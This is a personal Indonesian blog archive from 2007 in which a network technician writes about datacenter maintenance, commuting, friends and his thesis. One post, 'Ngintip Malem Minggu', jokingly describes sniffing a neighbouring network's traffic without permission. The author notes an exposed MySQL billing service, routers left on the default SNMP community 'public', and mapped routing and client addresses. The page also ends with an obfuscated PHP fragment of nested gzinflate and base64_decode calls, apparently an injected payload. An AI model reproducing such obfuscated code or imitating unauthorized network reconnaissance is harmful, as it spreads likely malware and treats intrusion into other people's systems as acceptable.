Delicious

Archives

Categories

Archive for 'Kebiasaan' Category





« »

Malem Minggu di IDC (begadang)

  ozzie / 01/07/2007

30/Juni/2007..
Sabtu Malem dapet undangan via telepon,=p~.. kabarnya tentang rencana pergantian MCB di IDC yg akan di lakukan pukul 23:00… #:-s.. (hanya matrix 2)
sekitar jam 22:30.. berangkat dari rumah<:-p.. sampe cyber langsung naik ke lt. 7… ternyata@-)@-) hidangan udah siap =)) kopi, teh, martabak, dan aneka macem kue2\:d/\:d/… dan ternyata udah pada rame :">:">.. Seru juga:D.. ketemu ama temen2 yang se-Profesi ;));)) sharing.. konsultasi… ngobrol.. ama kenalan :">:"> menjelang jam 23:00 semua di persilahkan untuk shutdown perangkat di racknya masing2 lalu deg2an menunggu eksekusi :-ss:-ss… tetapi:-s.. hingga menjelang jam 24:00 belum juga dieksekusi mati:-s :((:((:((… lalu aku pun turun untuk beli rokok di warung akang (uci) depan.. kangen2an.. ;)) soalnya waktu masih di lt. 8 biasa nongkrong, sahur di situ:">:">….. Gi enak2 minum di warung akang.. :"> lalu dapet telpon dari pihak IDC ;));)) lalu aku pun naik keatas ..:-ss:-ss setibanya di lt.7 pas keluar dari lift:-ss:-ss semua mata mamandang diriku :-ss:-ss:">:"> (kyk Bintang tamu aja =))=)) :"> ) ternyata..@-)@-) cuma gue nggak mattin isi rack :"> =))=))=))… (gue pikir masih banyak traffic yg liwat :-?? 8-} 8-} 8-} jadi biarin aja;)) nanti juga mati pas di eksekusi pasokan listriknya pasti mati :"> 8-} )..
Setelah semuanya siap.. listrik pun dimatikan..:-s:-s.. dan kami pun menunggu sembari mencicipi hidangan + nonton pelem :"> \:d/\:d/.. hingga pukul 01:15 lewat.. satu2 mulai masuk untuk menyalakan dan mengecek perangkat nya masing2 ;));));)).. Rame Bener :((:((:((.. Setelah semua kembali UP.. dan check2 configurasi.. akhirnya gue pulang<:-p<:-p nanti terusin remote dari rumah\:d/\:d/ (jam 02:30 :-ss:-ss ). kebetulan jalanan udah sepi:-s.. yg ada cuma anak2 gaul pada nongkrong di pinggir2 jalan ;));))… ( bukanya pada belajar..:-w:-w ntar pada nyesel baru tau? 8-}8-} ).. ama anak2 club motor yg gi touring..8->
menjelang arah minangkabau(manggarai) tepatnya di depan komplek AKABRI [menteng pulo] aku pun putar arah balik ke pancoran…:"> taklama mendengar suara “Gedabrukkk“!!.. lalu nengok dikit..:-ss:-ss gak taunya ada orang nge-geletak(terbaring) di jalan :-ss:-ss:-ss 8->8->… bukan salah gue dong :>:>:>:-s no-comment ahhh…:-":-" udah ahh :-j:-j gue mo pulang ;));));))..
ampe rumah denger kabar.. katanya “ada yang ngamuk2… gara2 outage maintenance”:-":-" =))=)).. MAMPOS!! kita berantem yuk? :>:>.. :)):)):)).. :-j:-j bodo ahhh.. :-":-" gue mo tidur (:|(:| ntar siang mo kondangan ke kawinan nya om Fachri ama ufa.. ;));)) <:-p<:-p =p~=p~ 8->8->..



Cerita apa Curhat ??

  ozzie / 22/06/2007

Kamis 21/Juni/2007.

ozzie pengen cerita nih..:">

Jadi gini: Tumben capek banged ni hari#:-s..
subuh2 udah kebut2an liar di kawasan rasuna said – mampang..:-ss padahal sih gak ada lawannya 8-}8-} cuman sendirian :)) gara2 pengen ngelawan downtime perangkat di gd. cyber=))=)).. udah kelar semua lalu pulang<:-p.. kebetulan pas mo pulang kerumah bertepatan jam orang2 berangkat kerja.. otomatis jalanan jadi macet#-o#-o.. lucu juga sih ngeliatin orang2 berebutan jalan mo ngantor;));)).. itung2 ikut nge-grecokin\:d/\:d/

Ampe rumah sarapan nasi uduk, ngopi, ngerokok, terusin monitoring:D… lalu mandi siap2 berangkat <:-p Kebetulan ada undangan Depkominfo di Hotel Sari Pan Pacific, Jakarta. yang pengen ngebahas Diskusi Mirror & FOSS (Free Open Source Software) dan akirnya ketemu ama temen2 dan menghasilkan http://www.foss-id.web.id/index.php/2007/06/21/forum-diskusi-mirror/..<:-p<:-p diteruskan makan siang dan kebetulan om Rully ikut hadir, dan ngobrol2 seputar perkembangan OpenBSD.or.id :D hingga acara selesai dan balik kekantor#:-s..

Baru sampe kantor, nyalain pc, ngeliat utilisasi perangkat yg masih memprihatinkan.. lalu meluncur lagi ke gd. cyber :((:((.. ampe sore lalu balik lagi ke kantor#:-s. huh..#:-s jadi bolak-balik :-s cek2 email, monitoring…
jam menunjukan pukul 17:00 saatnya berangkat kuliah<:-p… begitu turun dari lift jadi males :"> gak jadi deh kuliahnya… ;)) mendingan pulang aja.. <:-P<:-p

Sampe rumah ngeliat kondisi kamar yg memprihatinkan jadi kesel #-o#-o.. akhirnya janjian mo dinner bareng Mrs. X :">:"> ;));)).. kebetulan beliau baru mo pulang kantor ;)) ;)) ternyata :-ss:-ss rencana tertunda gara2 supir taksi yang membawa Mrs. X rada bolot alias tolol yang sengaja bikin muter2 lewat Gatot Subroto Segala#-o#-o#-o (masa supir taksi kok gak tau kondisi jalan pas waktu pulang kerja di jakarta? :-w:-w ) dari rencana awal ke tebet, cawang, kalibata..#-o#-o (besok2.. tungguin ozzie datang mbak l-).. pegangin.. biar kita telanjangin & obrak-abrik bareng:>:>.. belon tau siapa kita?? ;));)) Power-Ranger \:d/\:d/ ) hingga akhirnya naik kereta terakhir sampe St. Pondok Cina dan makan malam di kawasan Kapuk(Depok)\:d/\:d/\:d/\:d/ ….

Sekitar pukul 23:00 kawasan jalan margaonda mulai sepi..*DISENSOR*

Selebihnya PRIVATE untuk kalangan sendiri :P:P ;));))

udah ahh…. Capek Banged #:-s#:-s intinya PUAS!! =p~=p~



A Mistery Still Today…. [Heboh]

  ozzie / 20/06/2007

#:-s#:-s#:-s#:-s
Emang serba salah.#-o ampe bikin gempar, heboh beberapa kantor di jakarta =)) bahkan beberapa milis #-o#-o udah kayak artis aja8-}8-}8-} ampe di kejar2 paparazi =))=))

Ozzienich
*Foto by: Yoppie Pieter [http://www.flickr.com/photos/de-mocka/]

tolong kalo kasih comment yang sopan ya!! :">:">



Pengen Chating

  ozzie / 17/06/2007

Iseng-iseng pengen subuh gak bisa tidur…. ;));)).. klak-klik mouse…:-s browsing..:-s bosen =((… kebanyakan XXX :">:">… lalu colok mouse wireless.. lompat ke kasur <:-p<:-p

bengong 8->.. bingung mau ngapain :-??.. gak sengaja nge-klik icon Ym! di systray;)) pengen login males ngetiknya :-s:-s.. akhirnya dapet ide.. “Kenapa gak bikin langsung login aja??? :-/ ;));));)). akhirnya ngoprek YM deh \:d/\:d/\:d/

Pengen Chating
mo liat Detail om????

akhirnya bongkar2 *.dll.. kebetulan ane pake ym7 :"> ternyata isinya ada di file res_msgr.dll ;));));)) edit2 isinya.. apus yg gak perlu… :D isi default id nya ozzienich + textbox nya di disable :"> .. biar gak ada yg bisa pake YM =))=))=))=)) sekalian tambahin datepicker ama status bar bawaan dll mscomctl :)):)) pengennya sih activeX nya media player;)) biar gak repot kalo mo nonton:>:>..
8->8-> inget dulu nonton video, denger mp3, remote desktop di dalem ms. word ato ms. excel ;));));)) btw… udah ada yg pernah coba winbox nya mikrotik di dalem corel draw blon?? ;));));))

hihihihih.. nge-bahas windoz :-&:-& 8-}8-}8-} jadi malu eyke :">:">:">



My Desk

  ozzie / 14/06/2007

Huhhh…. #:-s#:-s Pegel, puyeng, Capek, Perih, tegang;)). tiap hari ketemu monitor, keyboard yg udah bolong-bolong kena bara rokok, bandwidth, kopi, rokok dan suara musik progressive rock ;)) untung disamping nya ada kasur ;))… tinggal nyender ;))

kk

beginilah suasana meja kerja di kamar ;)).. yg biasa di pake buat nge-remote, chating, monitoring, scripting, browsing, smoking, drinking, watching, hacking, sniffing, listening, singing, sleeping :D:D.. sumpek, pengap, kotor :-s.. abu rokok, tumpahan kopi ama sampah-sampah bungkus cemilan, biskuit, cokelat, snack .. … sampe bungkus nasi-goreng, nasi-uduk, botol-botol air masih ada di pojok ;)) males bawa turun ke dapur:">.. koleksi upil yang udah penuh;))….
mungkin saking padatnya akhir-akhir ini.#:-s udah dikejar-kejar.. ampun om ^:)^.. pak^:)^.. mbak..^:)^.. sayah juga harus bagi-bagi waktu… kerja, mandi, makan, sholat, tidur, kuliah.. blon lagi undangan… buat kamis depan #:-s ditambah rencana sabtu depan kita mbak..:-s -naek gunung bakar lemak, fotofoto cari object- =((=((=(( (update jumat malam)

makasih buat Om-om donatur ;)) yang udah supply stok rokok:D….
maap.. ^:)^ tinggal dikit lagi pak.#:-s.. moga-moga pas opening jakarta fair udah fix[-o<[-o<
maap ^:)^ om.. tinggal ngerapihin field-fieldnya aja…
maap ^:)^ mbak… bukannya sayah invisible mulu:-s.. tapi masih keseringan outdoor.. tapi masih sayah lanjutkan kok ;)
dan beberapa yang masih di waiting list :D… maklumlah.. pagi+siang+sore.. waktu dipake kerja+kuliah..

^:)^ maap buat dosen pembimbing..;)) sayah gak jadi skripsi semester sekarang :-s… oiya.. buat temen2 yang baca…;)) gue nitip absen yak:> nanti gw kekampus pas UAS aja ;)) muachhh :*:*:*:*



Demam!!!

  ozzie / 04/06/2007

Akibat keasikan main di outdoor, dan ampir satu minggu ni rutin balik kerumah tengah malem terus, bahkan kadang2 udah menjelang Pagi.. akhirnya kondisi badan jadi nge-Drop.
tapi ada enaknya juga, setiap mo pulang pasti makan-makan dulu, random di setiap rute jalan mo pulang :D, pecel lele+ayam, nasgor, seafood dll\:d/ ketawa-ketiwi ngeliatin tempat sambel pasti abis ama om ucup =))=)) entahlah:-?? sayah juga heran :-? mungkin manusia setengah monyet kali ya? :(|):(|):(|):(|):(|):(|)
Gila
menu di kawasan jl. Pemuda (Pramuka).

Sambil Melihat kehidupan malam jakarta, dengan berbagai warna-warni kehidupan ;)), mulai dari aksi premanisme di beberapa perempatan dan lampu merah, kebut2an liar disepanjang jalan buncit, mampang, minangkabau-manggarai dengan suara knalpot yg kenceng, melihat berbagai macam wanita malam ;)) dari yg Wah!! hingga buruk rupa yg terkesan terlalu memaksa=))=)).. para ABG borju yg nongkrong memamerkan kendaraannya di kawasan Pondok indah, dan kawasan Senayan.
dan sempat beberapa kali menonton acara razia kendaraan yg tanpa surat perintah:-s preman berseragam yg memalak setiap truk, kontener, mobil box yg lewat.:-&

hingga akhirnya kondisi badan menjadi drop =(( mungkin keseringan kena angin malam, kurang istirahat.. :-s terkadang ujan-ujanan hingga kebasahan dan menjemur sepatu di antenna ;))
Sepatu Ozzie



Radiasi

  ozzie / 14/05/2007


Ozzienich

*.Dilarang Keras men-Copy Gambar diatas. Penulis tidak bertanggung jawab apabila Anda mengalami gejala Kangen. >:) >:)



Entahlah

  ozzie / 02/05/2007

ga Tau kenapa.. :-??:-?? jadi sering keluar rumah:-?… doyan main + nongkrong lagi :-s.. balik pagi terus:((
padahal bikin skripsi belon selesai :(( kerjaan + project masih banyak :(( helppp!!! kena denda project lagi dahh =((=((
gw pengen kyk dulu lagi :((:((:(( CLEAR CMOS kali ya :-??:-?? lupakan



Tour ke Bekasi

  ozzie / 21/04/2007

Jumat – Sabtu. 20-21/04/2007… Pulang Ngantor diajakin “ngalong” ke bekasi =p~=p~. Silaturahmi sekalian ngumpul bareng semua crew jakarta-bekasi di salah satu basecamp bekasi di ruko 4 lantai ;)). tapi sayang cowo semua :((:((:((:(( dan 2 orang personil baru jakarta behalangan dateng :( [ucup + bodong]. :-?:-? padahal menu udah okeh… ;)) stok rokok, kopi, cemilan ama anuan =p~=p~ :>:>

Lalu kita kedatengan bintang tamu :x :x grogi juga sih… :-s .. pas mau ketemuan ;));)) maklum blum pernah ketemu ya om ?? :">… biasa ketemu di Forum linux ama chat aja ;));)) beliau adalah Anjar Hardiena [a.k.a zarathustra] <:-p<:-p<:-p.. hehehe.. pake acara misscall-2-an ;)).. takut salah orang… maklum udah malem, rada gelap :D.. begitu buka pintu… @-)@-)@-).. taaadaaa :-ss:-ss ternyata cowo juga #:-s >:D<.. hehehehe :D

makasih ya om dah mao mampir, sharing, konsultasi Zencafe nya .. ^:)^ ^:)^ ^:)^ maap kalo service nya kurang hot ;));));))
[-o<[-o<[-o< sukses terus ya om… ;) nggak nyangka deh… bisa ketemuan ama artis linux :">
Bgenk
curang :((:(( fotonya ama Fachri doang :-s lupa foto bareng ane…. =((=((

Rencana mao berenang ama ke kampus gak jadi :( ketiduran..#-o bangun siang :-s:-s:-s… udah mao sore balik kerumah dianterin ama mas Fachri.. :"> sekalian jalan cari rumah makan… pas lagi enak2 makan dapet telpon “… …. …. … pondok gede kena petir! “ :-ss:-ss:-ss #-o jalan2 lagi deh \:d/\:d/ gak jadi melem mingguan deh mas Fachri=((=((=(( :-s:-s:-s =))=))



PoE dan UTP

  ozzie / 05/04/2007

Malem Jumat.. (05-April-2007)
“Kisah matinya Radio SmartBridge dirumah.. ” #-o

Pulang kuliah nyalain komputer mao cek link ama monitoring… ehh link dari rumah mati :((:(( tumben-tumbenan mati:-? biasanya 24 jam gak pernah putus #:-s
waktu siang sih sebelon berangkat kuliah masih normal… :-s:-s terpaksa langsung naik ke loteng:((:(( mana masih capek.. pulang naik kereta terakhir… masih bau :((:((.. udah ampe gudang trus ngecek PoE nggak taunya Kebakar:-ss… pas di periksa ternyata banyak air di kabel UTP nya :-ss pantesan kebakar#:-s… setelah di telusurin ternyata ada kulit kabel yang bolong#-o keknya pas sore ujan.. kabel UTP berubah jadi Selang pas kemasukan Air, kebetulan pas ujungnya langsung nancep ke PoE.. Jadi Kebakar dehh =((=((….
Untungnya masih ada stock Radio Nganggur :D:D

Sekedar sharing aja: :"> Waspadalah buat temen-temen yang punya Kabel UTP bolong :D Ane dah pernah Ngalamin. :-s:-s :((:((



“Withheld”

  ozzie / 01/04/2007

FYI:
:-":-":-" mao ampe ribuan kali nge-call kek, KAGAK BAKALAN GUE ANGKAT;)) ;)) So..! [-x[-x jangan pernah nelpon gue pake fasilitas “Private Number” ato acara ngumpetin nomer segala ;)

Jadi.. maap aja kalo telpon gak diangkat:-s, coba periksa dulu ;));));)) peace.. >:)>:) Heheheheh……. :-h:-h



Tugas Akhir

  ozzie / 26/03/2007

Bismillahirohmanirohim [-o<[-o<[-o< persiapan nulis tugas akhir.. cari-cari judul :-s mana administrasi harus lengkap #:-s#:-s. Mao pinter kok Mahal:(… kerja keras terima project;)).. “Doakan Saya yaaa!(Gaya Benteng Takeshi)\:d/\:d/\:d/

Mohon maap kalo: gak pernah Online ^:)^, di Cuekin ^:)^, gak terima telepon ^:)^, gak bales SMS ^:)^. :-h:-h:-h gak maksud apa-apa kok ;)… cuma …..:-s :-s cuma beri o.z kesempatan buat coba bahagiakan kedua orang tua, keluarga [-o< dan cita-citaku :">:"> dari hasil usahaku selama ini ^:)^ ^:)^..



Akhirnya Keluar Juga…!!!

  ozzie / 19/03/2007

Senin. 20 Maret 2007 kebetulan bertepatan dengan hari libur nasional (Nyepi). Mungkin bagi sebagian orang kantoran itu merupakan libur panjang.=P~ tapi bagiku tidak berpengaruh apa-apa. :-s hari sabtu: pasang perangkat di cyber, lalu kembali lagi ke kantor (century) karena ada client yg mau re-new perangkatnya, hari minggu: monitoring sambil main CS di kamar. :D hari senin: monitoring network di kasur, berhubung hari libur pas nyepi kapasitas bandwidth lumayan lega. ;)) jadi kenceng download. <:-p

Menjelang siang, perasaan suntuk, bosen, pengap mulai muncul dan ingin rasanya keluar kamar, :((:(( tapi mo kemana?. :-/ cuaca sangat panas, bimbang, ragu, kesel. akhirnya punya rencana mo pulangin tas HARY (kebetulan minggu kemarin di pinjem buat bawa buku). :"> menjelang sore berangkat naik KRL dari stasiun tebet, sambil menikmati suasana sesaknya gerbong tapi membuat hatiku lega karena berbeda dengan sesaknya kamar yang penuh dengan kejenuhan yang bikin pusing. :((:((

Sampe di stasiun UI depok, jalan ke rumah hary, udah nyampe depan pintu pagar rumahnya gue nggak langsung masuk, tapi nongkrong dulu di pinggir jalan margonda guna melihat suasana jalan yang penuh kendaraan dan para pejalan kaki yang lewat. :D lumayan lama duduk sendiri menikmati suasana jalanan, di temani sebotol air mineral. berbatang-batang rokok dan suara Fuad di HP yang minta di temenin buat mengurus network bekasi, #-o udah 90 menit duduk sendirian, gue telepon hary buat ngabarin kalo gue nyampe di rumahnya. ;)) gak lama keluar juga tuh anak, lalu ngajak jalan-jalan. karena dia pun sudah suntuk seminggu di kamarnya, =)) gak berangkat2 kekantor kegilaan scripting.=p~=p~ .

Tujuan pertama naik angkot ke Margo City. udah sampe dalem, berharap ada sesuatu yang bisa di beli, akhirnya buru-buru cari ATM, ;)) jalan lagi ke Detos :((:(( akhirnya ketemu ATM di SPBU deket pertigaan jalan baru (juanda). #:-s masuk lagi ke gunung agung cari buku.. tapi gak ada bukunya :((:(( pindah lagi ke gramedia, gak ada juga :((:(( akhirnya si hary beli senar buat gitar electric-nya :D #:-s

gw baru pertama main ke margo.. maklum udah lama gak main ke depok, bagus juga ada skate park nya =P~=p~ jadi pengen main skate lagi 8->8->.. inget waktu doyan2nya main skate di senayan.. :x , ollie ampe 5 papan =p~… kick-flip 360 drajat =p~… jadi pengen cari papan.. tapi liat2 di toko sport harganya lumayan murah.. tapi papan-nya tipis amat, truck nya juga keliatan lemes :-s
sayang, cuma sisa ni fotonya:( udah pada ilang foto2 waktu kompetisi :((:((
ozzienich
tapi berhubung masa & umur udah lewat..=((=(( cukup main *BSD, linux, ama scripting aja sekarang:">
sekalian dikit2 main classic-guitar lagi :D<:-p

hari udah malem… laper, akhirnya kita makan nasi uduk di pinggir jalan margonda:D ( tapi berdua ama hary lagi :-& tapi kepake juga buat ngusir yang ngamen :)):)) ). pengen jalan lagi.. mo ke RAJASA tapi takut om gorilla nya gak ada :-s.. jadi gak jadi=(( lalu balik ke rumah hary… istirahat, ngopi sambil nonton pelem anu \:d/\:d/

ozzienich
Cieeeee yang lagi Pasang Senar baru <:-p Salam oi!! oi!! oi!!;))

udah ampir jam 22:00 saatnya pulang.. <:-p cuma angkutan udah abis :(. terpaksa naik mobil kalong ;)) capek juga jalan-jalan.. tapi gak apa2.. yang penting keluar dari kamar <:-P
Tapi ama Hary :-& :((:((…. gak tau kenapa??? :-?? :-?? tapi kita normal kan dunx? [-o< masih suka wanita =p~=p~=p~ 8->8->8-> mungkin nasib/hobby kita sama:d musik?, linux?, *BSD?, mainan?;)) koleksi? :"> anuan? =p~

ozzienich
oiya… buat dede nya Hary: “Akang nya masih 100% utuh, kagak ozzie apa2in. ” ^:)^ ^:)^ ^:)^ cuma diracunin paket *.tar.gz ;));))

Alhamdulillah jam 23:40 sampe rumah dengan selamat#:-s#:-s…. minum dulu.. sekalian bikin kopi buat nulis blog ini..



Main ama Hary (lagi)

  ozzie / 11/03/2007

Udah 2 minggu cuma ngintip #:-s bosen juga :-s aghhhh !!
keluar ah jalan-jalan ke depok… \:d/\:d/ mumpung motor nganggur ;)).. rencana-nya: mo balikin DVD dream theater ke ADE, lalu mampir ke warnet TOMMY, lalu ambil WLAN di HARY. sekalian silaturahmi :D tapi berhubung posisi HARY(margonda) pertama dari tebet, akhirnya mampir duluan deh :">:">.

Sampe di tempat HARY, jadi males :rencana-nya:-s:-s akhirnya nemenin HARY ke bengkel, lalu silaturahmi mampir ke RAJASA, tapi sayang om Gorilla-nya gak ada =(( .. lalu kita makan bakso deh berdua di kelapa dua :X:X (tapi ama HARY :-& :-& abis gimana dong?? :-?? :-?? :-s Jiji + Geli juga sih =)) =)) ) .. ya maklum lah :-s… tapi kita NORMAL kok :>:>.. iya kan dunx?? ;;);;)

Setelah itu rencana mo liat-liat buku di gramedia margonda, tapi akhirnya kita (masih ama HARY :-& boncengan :(( berdua pula :-ss ) lewat UI dan keluar di Stasiun. Pondok Cina.. ( kapok nginep di SEL polres depok :((:(( ) lalu melihat ada toko buku, akhirnya kita ( masih ama HARY =)) ) mampir disana.. “lumayan lengkap koleksi buku-buku disana” gak lama masuk dan liat-liat, lalu penjaga toko berkata “buku-buku komputer ada di sebelah sini mas… harganya juga oke loh….” tak lama kami pun serentak membalas “Sumpehh Loooo!!! “ =))=))=))=)) dasar tukang dagang #:-s ;)) lalu kami memilih, membeli dan membayar buku, cukup 6 buku saja#:-s … itupun setara 30 bungkus rokok Star-Mild :-s:-s biarin deh puasa nge-rokok.. yg penting bisa nambah ilmu ama koleksi mini perpus di rumah [-o<[-o<

Diantara 6 buku, ada 2 jilid PRACTICAL TCP/IP karya Niall Mansfiel, lumayan buat nemenin ngintip ;)) mumpung mereka masih broadcast :-":-" sekalian buat bahan tugas akhir :"> yang kebetulan konsentrasi Networking… doain ya [-o<[-o< ;)

Setelah puas belanja buku, lalu kita (masih ama HARY :((:(( ) nongkrong sebentar di depan toko buku sekalian nge-rokok + nge-’liatin’ orang-orang yang lewat =p~=p~ …. berhubung hari sudah malam akhirnya kita kembali ke rumah HARY untuk mengambil motor-ku… sesampainya disana, kami me-review buku yang baru dibeli, ditemani dengan nonton koleksi pelem crypt(Kobep) punya hary sedikit @-)@-)@-)… dan ozzie pun bergegas untuk pulang, karena persiapan untuk kerja + kuliah esok hari #:-s #:-s senang-nya pulang membawa buku baru \:d/\:d/\:d/ <:-p<:-p

ozzienich

: makasih buat kk HARY… muachhhhhhh :*:*:*:* ( gaya si ‘anu‘ di udel) ;)) 8->8->8->..



Ngintip Malem Minggu…

  ozzie / 04/03/2007

Seperti biasa Malem minggu di kamar bareng cemilan yg low colestrol, kopi, rokok & bandwidth ;))
ampe2 disuruh pacaran ama om gorilla :-s jadi minder =((=((

dari pada bengong… iseng deh ^:)^
mohon maap buat salah satu hostmaster@xxxxx.xxx.xx yg di webmya ada banner operator selular ;)) gak sengaja ngintip.. abis ARP+IP nya broadcast terus kekamar, jadi ane coba2 deh :"> lumayan banyak boss :D tapi manteb kok ;) root nya di encrypt boooo!!!:-":-" #:-s tapi keliatan tuh billing sms nya yg pake port 3306:D:D ane gak jahat kok :*:*. tapi beberapa router kok SNMP community nya masih public :-s walau beberapa ada yg udah di ganti tapi inisial belakangnya masih sama semua :-" … yaaa ane gambar aja dikit2 ;)) info, contact, vendor, routing, ip client ama subnetting nya :">

tapi sayang di kernel ane ada error di libnet_write_raw_ipv4() nya. jadi gak optimal:((:((

trus salah siapa dong??? :-?? :-?? heheheheh
bukan salah ane dong:-o :-o kyknya salah di layer 1(Physical) yg ke NOC yg di roof ntu.. ;)) connect ke situ juga kan? ;)) soalnya ntu langsung ke kamar ane & banyak yang bocor #-o ampe2 broadcast terus ke kasur ane, jadi keliatan sibuk deh switch ane.. =))=))=))



Masih OON ?

  ozzie / 03/03/2007

:((:((:(( Oon banget kalo masalah ntu #-o#-o gak tau kenapa? :-/ :-?? namanya juga masih nubi + belon pengalaman :-s mungkin gw nya yg pemalu ato blon berani main anu-an :(( sementara ngeliat orang2 enak banget 8->8-> jadi pengen =p~=p~

bodo ahh… yang penting buru-buru selesaiin kuliah… daripada uang abis buat bayar dosen+
ongkos+jajan+kuliah dan tetep aja bego:((:((



Jakarta Banjir….

  ozzie / 03/02/2007

Lagi Tumben neh, nulis beginian ;));)):
Bencana banjir kembali melanda ibu-kota setiap 5 taon sekali :-s
kayaknya udah rame dehh beritanya :))

intinya:
Telepon kantor jadi mati.
NOC bekasi down akibat pemadaman listrik yg mengakibatkan server-server (slackware.linux.or.id, tahanan.web.id, kebonbinatang.org, photo.web.id, karyagroup.com, hobbyfotografer.net, voip.ozzie.web.id, DLL…) down !! :(
dan beberapa client yang dirugikan akibat BTS ikut down :-s



tahanan.web.id

  ozzie / 02/02/2007

10-Januari-2007 00:00:00

  ozzie / 10/01/2007

10-Januari-2007 :
1. = A**** :">
2. = ???
3. = ???

Silahkan yg mau isi comment :D. Bebas tapi Sopan ;));))



Sabtu – Minggu Kelabu

  ozzie / 07/01/2007

Setiap akhir pekan selalu bengong sendirian di kamar 8-> Sumpek, Pengap, BT :((

2 hari cuma di temani Bandwidth, Music Progressive Rock, Rokok 9 bungkus, Kopi sekitar 25 gelas. mandi males, “nanti aja senen pagi mandinya:"> bosen, mao ngoprek males, gak semangat, gak ada inspirasi, yg ada cuma browsing gak jelas. klak-klik mouse di browser :((:(( sesekali Alarm bunyi, check link !! :((:((

Mau main keluar, Temen-temen udah pada ilang =(( Sekalinya ada.. Anak2 Gaul yg keren2 yg pada main motor dan para penjahat newbie yg masih doyan mabok, yg bandel-nya gitu2 aja, gak berkembang :-s Telat Nakal-nya ;)) gak jelas #:-s



".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>